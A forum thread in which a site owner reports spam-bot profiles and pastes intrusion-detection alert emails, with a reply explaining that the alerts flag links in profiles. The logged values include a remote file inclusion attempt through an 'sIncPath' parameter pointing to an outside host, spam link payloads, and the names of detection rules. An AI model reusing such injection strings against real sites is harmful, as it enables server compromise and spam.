d7 rc1 attack!

are site get attack bay spamers, that open new profile automatic on are site and send spam messagess to the members in are site.

we see the new profile and they look authentic, and we gat email frome are server :

Total impact: 16

Affected tags: xss, csrf, id, rfe, lfi

Variable: REQUEST.tags_mode | Value: profile  //?sIncPath=http://schulen.eduhi.at/hsstmartin.m/cache/1???

Impact: 8 | Tags: xss, csrf, id, rfe, lfi

Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

Variable: GET.tags_mode | Value: profile  //?sIncPath=http://schulen.eduhi.at/hsstmartin.m/cache/1???

Impact: 8 | Tags: xss, csrf, id, rfe, lfi

Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

REMOTE_ADDR: 122.199.140.158

HTTP_X_FORWARDED_FOR:

HTTP_CLIENT_IP:

and more email:

Affected tags: xss, csrf, id, rfe, lfi

Variable: REQUEST.DescriptionMe.0 | Value: SYCHnU  <a href=\"http://tzoytebwecga.com/\">tzoytebwecga</a>, [url=http://poujhzfpqxql.com/]poujhzfpqxql[/url], [link=http://nqfndqggcpfn.com/]nqfndqggcpfn[/link], http://iqevuxlejpuk.com/

Impact: 9 | Tags: xss, csrf, id, rfe, lfi

Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20

Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

Variable: REQUEST.DescriptionMe.1 | Value: SYCHnU  <a href=\"http://tzoytebwecga.com/\">tzoytebwecga</a>, [url=http://poujhzfpqxql.com/]poujhzfpqxql[/url], [link=http://nqfndqggcpfn.com/]nqfndqggcpfn[/link], http://iqevuxlejpuk.com/

Impact: 9 | Tags: xss, csrf, id, rfe, lfi

Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20

Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

Variable: POST.DescriptionMe.0 | Value: SYCHnU  <a href=\"http://tzoytebwecga.com/\">tzoytebwecga</a>, [url=http://poujhzfpqxql.com/]poujhzfpqxql[/url], [link=http://nqfndqggcpfn.com/]nqfndqggcpfn[/link], http://iqevuxlejpuk.com/

Impact: 9 | Tags: xss, csrf, id, rfe, lfi

Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20

Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

Variable: POST.DescriptionMe.1 | Value: SYCHnU  <a href=\"http://tzoytebwecga.com/\">tzoytebwecga</a>, [url=http://poujhzfpqxql.com/]poujhzfpqxql[/url], [link=http://nqfndqggcpfn.com/]nqfndqggcpfn[/link], http://iqevuxlejpuk.com/

Impact: 9 | Tags: xss, csrf, id, rfe, lfi

Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20

Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

REMOTE_ADDR: 120.28.64.85

HTTP_X_FORWARDED_FOR:

HTTP_CLIENT_IP:

These people you are talking about are putting URLs/Links in their descriptions which is not allowed.You will see the error here:

Detects url injections and RFE attempts

I would say ban/delete these members from your site. These emails serve as a warning to you to allow you, the site administrator to make the decision on "what" to do with members who post website links and spam.

Chris